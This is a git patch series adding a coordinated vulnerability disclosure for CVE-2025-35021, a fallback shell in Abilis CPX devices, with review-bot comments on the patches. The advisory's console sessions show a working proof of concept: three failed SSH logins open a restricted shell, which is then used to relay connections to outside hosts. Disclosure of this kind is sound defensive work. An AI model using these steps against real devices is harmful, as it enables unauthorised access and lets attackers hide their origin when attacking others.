From 2e83c655377aa04ef2c67537fbd0a9622be4c188 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 1 Oct 2025 15:09:09 -0400 Subject: [PATCH 1/4] Grr typo on bold Signed-off-by: Tod Beardsley --- content/cve.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/content/cve.md b/content/cve.md index 4767189..92f8b72 100644 --- a/content/cve.md +++ b/content/cve.md @@ -210,7 +210,7 @@ When we publish CVEs, we will tend to use this [template], adjusted to taste. | CVE | Meeting | Issue | GCVE | | ----------------- | --------- | ------------------------------------------ | ---- | | [CVE-2025-8452] | 0x00e2 | **Brother Printer Serial Number Disclosure** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001] | -| [CVE-2025-35027] | 0x00e4 | **Unitree Robotics Command Injection ** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010] | +| [CVE-2025-35027] | 0x00e4 | **Unitree Robotics Command Injection** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010] | ## Reserved GCVEs From 76712bb38a3c3b5bb840be13776e49d7e5196d2b Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Fri, 31 Oct 2025 10:27:56 -0500 Subject: [PATCH 2/4] Reserve GCVE for upcoming disclosure Signed-off-by: Tod Beardsley --- content/cve.md | 1 + 1 file changed, 1 insertion(+) diff --git a/content/cve.md b/content/cve.md index 92f8b72..7d8b8fd 100644 --- a/content/cve.md +++ b/content/cve.md 
@@ -224,6 +224,7 @@ That said, starting in August of 2025, we've started to reserve [GCVEs](https:// | Meeting | GCVE (Reserved) | |---------|-----------------| | 0x00e4 | GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011 | +| 0x00e5 | GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 | From 24b86a8f90b48b3627aa44e12c63587532606130 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 3 Nov 2025 18:09:56 -0600 Subject: [PATCH 3/4] Add HD's thing Signed-off-by: Tod Beardsley --- content/cve.md | 4 +- content/cves/CVE-2025-35021.md | 129 +++++++++++++++++++++++++++++++++ 2 files changed, 132 insertions(+), 1 deletion(-) create mode 100644 content/cves/CVE-2025-35021.md diff --git a/content/cve.md b/content/cve.md index 7d8b8fd..23be972 100644 --- a/content/cve.md +++ b/content/cve.md @@ -211,6 +211,7 @@ When we publish CVEs, we will tend to use this [template], adjusted to taste. | ----------------- | --------- | ------------------------------------------ | ---- | | [CVE-2025-8452] | 0x00e2 | **Brother Printer Serial Number Disclosure** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001] | | [CVE-2025-35027] | 0x00e4 | **Unitree Robotics Command Injection** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010] | +| [CVE-2025-35021] | 0x00e5 | **Abilis CPX Fallback Shell Connection Relay** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100] | ## Reserved GCVEs 
@@ -224,7 +225,6 @@ That said, starting in August of 2025, we've started to reserve [GCVEs](https:// | Meeting | GCVE (Reserved) | |---------|-----------------| | 0x00e4 | GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011 | -| 0x00e5 | GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 | @@ -273,5 +273,7 @@ Vulnerabilities involving other parties must be either (1) presented at a regula [CVE-2025-35010]: {{< baseurl >}}cves/cve-2025-35010/ [CVE-2025-8452]: {{< baseurl >}}cves/cve-2025-8452/ [CVE-2025-35027]: {{< baseurl >}}cves/cve-2025-35027/ +[CVE-2025-35021]: {{< baseurl >}}cves/cve-2025-35021/ [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001 [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010 +[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 diff --git a/content/cves/CVE-2025-35021.md b/content/cves/CVE-2025-35021.md new file mode 100644 index 0000000..4ede489 --- /dev/null +++ b/content/cves/CVE-2025-35021.md 
@@ -0,0 +1,129 @@ +--- +title: CVE-2025-35021 +aliases: + - /cves/CVE-2025-35027.html + - /gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 +publishDate: 2025-11-03T18:06:00-06:00 + +--- + +## CVE-2025-35021: Abilis CPX Fallback Shell Connection Relay + +[AHA!] has discovered an issue with Abilis CPX devices, and is publishing this disclosure in accordance with runZero's standard [disclosure policy] today, November 3, 2025. [CVE-2025-35021] has been assigned to this issue. Any questions about this disclosure should be directed to cve@takeonme.org. + +The [GCVE](https://gcve.eu/about/) identifier for this issue is [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100] + +# Executive Summary + +By failing to authenticate three times to an unconfigured Abilis CPX device via SSH, an attacker can login to a restricted shell on the fourth attempt, and from there, relay connections. This issue is an instance of [CWE-1188](https://cwe.mitre.org/data/definitions/1188.html), 'Initialization of a Resource with an Insecure Default,' and is estimated to have a CVSS 3.1 score of [6.5](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). The relevant [SSVC] vectors for this vulnerability are *Exploitation: PoC* and *Technical Impact: Partial*. + +# Technical Details + +A number of Abilis CPX devices drop to a fallback shell after three unsuccessful login attempts, if the device is not already configured with an SSH password. This shell allows outbound sessions from the device. + +In the example console session below, three known-incorrect logins (`bad`) are offered to an affected device before being dropped to the `SSHS` prompt. 
+ +``` +$ ssh root@[TARGET] +root@TARGET's password: + +COM + +Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 - Abilis ID NNNNNNN +Tuesday 19/08/2025 06:07:48 (UTC+02:00) - UpTime 2 days 11:20:42 +Login: bad + +PERMISSION DENIED + +Login: bad + +PERMISSION DENIED + +Login: bad + +PERMISSION DENIED + + +CLR F0 AE + +[192.168.11.002] SSHS> +``` + +At this point, we are in the `SSHS` shell. This is a restricted shell, though it can be used as a relay to other systems. The below example uses the `SSHC` shell: + +``` +[192.168.11.002]help +CP Open connection to local CP resource +SSH Open connection to local SSH client +TELNET Open connection to local TELNET client +- Open X25 call with CD and UD +CLR Close connection +CLOSE Close SSH Session +EXIT Close SSH Session +HELP Show current help +[192.168.11.002] SSHS>SSH +[192.168.11.002] SSHC> +[192.168.11.002] SSHC>OPEN 8.8.8.8:53 +Trying 8.8.8.8:53 ... Open + +Version identification fault +``` + +Similar to the `SSHC` shell, the `TELNETC` shell offers another path to connection relaying, and does not require the service to handshake a particular way: +``` +[192.168.11.002] SSHS>TELNET +[192.168.11.002] TELNETC> +[192.168.11.002]TELNETC>open 1.2.3.4:5678 +Trying 1.2.3.4:5678 ... Open +``` + +## Affected Products + +Affected versions of CPX devices include: + +* Abilis CPX - Ver. 7.4.10/STD - Build 3608.48 +* Abilis CPX - Ver. 8.10.2/STD - Build 4703.15 - Branch 8.10 +* Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 +* Abilis CPX - Ver. 8.11.0/STD - Build 4715.15 - Branch 8.11 +* Abilis CPX - Ver. 8.11.11/STD - Build 4715.52 - Branch 8.11 +* Abilis CPX - Ver. 8.11.14/STD - Build 4715.57 - Branch 8.11 +* Abilis CPX - Ver. 8.11.2/STD - Build 4715.19 - Branch 8.11 +* Abilis CPX - Ver. 8.11.5/STD - Build 4715.28 - Branch 8.11 +* Abilis CPX - Ver. 
9.0.0/STD - Build 4957.3 - Branch 9.0 + +Across these devices, affected SSH banners include: + +* SSH-1.99-CPX SSH Server +* SSH-2.0-CPX SSH Server + +## Mitigation + +According to the vendor, setting a password to the SSH service will effectively remedy this behavior. Furthermore, firmware version 9.0.7 has been released so users can no longer accidentally expose an effectively no-authentication relay service. + +# Attacker Value + +By providing a pivot point to relay connections, attackers can use affected CPX devices to effectively shield their true originating IP address when launching attacks against other targets. + +# Credit + +This issue was discovered by [HD Moore](https://www.runzero.com/authors/hd-moore) and disclosure was coordinated by [Tod Beardsley](https://www.runzero.com/authors/tod-beardsley/) through the [AHA!] CNA. + +# Timeline + +* 2025-08-09 (Sat): Briefly demoed at [Def Con 33] in the presentation, [Shaking Out Shells with SSHamble] +* 2025-08-19 (Tue): Initial contact to the vendor at info@antek.it +* 2025-08-20 (Wed): Provided technical details to the vendor +* 2025-08-22 (Fri): Vendor acknowledged the vulnerability as a configuration issue +* 2025-10-21 (Tue): Vendor released [Abilis firmware update 9.0.7](https://support.abilis.net/relnotes/cpx2k/R9.0.html#R9.0.7) +* 2025-10-30 (Thu): Findings presented at AHA! 
Meeting 0x00e5 and [CVE-2025-35021] reserved +* 2025-11-03 (Mon): This public disclosure + +---- + +[AHA!]: https://takeonme.org +[disclosure policy]: https://takeonme.org/cve.html +[CVE-2025-35021]: https://www.cve.org/CVERecord?id=CVE-2025-35021 +[SSVC]: https://www.cisa.gov/stakeholder-specific-vulnerability-categorization-ssvc +[Def Con 33]: https://www.youtube.com/watch?v=XHoH4ic8fX8 +[Shaking Out Shells with SSHamble]: https://www.runzero.com/def-con-33-hd-moore/ +[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 From 0bcbe63f89674c7cdd4c52867e066a1538658353 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 3 Nov 2025 18:14:14 -0600 Subject: [PATCH 4/4] Update reserved GCVE table Signed-off-by: Tod Beardsley --- content/cve.md | 1 - 1 file changed, 1 deletion(-) diff --git a/content/cve.md b/content/cve.md index 2903f9b..23be972 100644 --- a/content/cve.md +++ b/content/cve.md @@ -225,7 +225,6 @@ That said, starting in August of 2025, we've started to reserve [GCVEs](https:// | Meeting | GCVE (Reserved) | |---------|-----------------| | 0x00e4 | GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011 | -| 0x00e5 | GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 |
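Review bot: In PATCH 3, the new file `content/cves/CVE-2025-35021.md` carries a wrong alias in its front matter: `  - /cves/CVE-2025-35027.html` names the previous advisory's CVE, so the legacy URL for CVE-2025-35027 would be claimed by this page while this advisory gets no `.html` alias of its own; it should read `  - /cves/CVE-2025-35021.html`. Two smaller points in the same hunk: the Affected Products list is sorted lexically (8.11.11 and 8.11.14 appear before 8.11.2 and 8.11.5), and ordering it numerically (8.11.0, 8.11.2, 8.11.5, 8.11.11, 8.11.14) makes it easier for an operator to check their build; it would also help to state whether the list is exhaustive or only the builds observed, given that the Mitigation section implies everything before 9.0.7 is affected. Finally, "an attacker can login to a restricted shell" in the Executive Summary should be "log in to", and the advisory opens with an H2 title (`## CVE-2025-35021: ...`) followed by H1 sections (`# Executive Summary`), which inverts the heading hierarchy unless the site template expects that shape.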
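Review bot: PATCH 4 (`Update reserved GCVE table`) removes the `| 0x00e5 | GCVE-1337-2025-...100 |` row from the Reserved GCVEs table, but PATCH 3's second hunk (`@@ -224,7 +225,6 @@`) already removes that same row, and PATCH 4's pre-image blob `2903f9b` does not match PATCH 3's post-image `23be972`, so the series will not apply cleanly in the order given. Either drop PATCH 4 or squash it into PATCH 3, whichever reflects the branch the series was actually generated from.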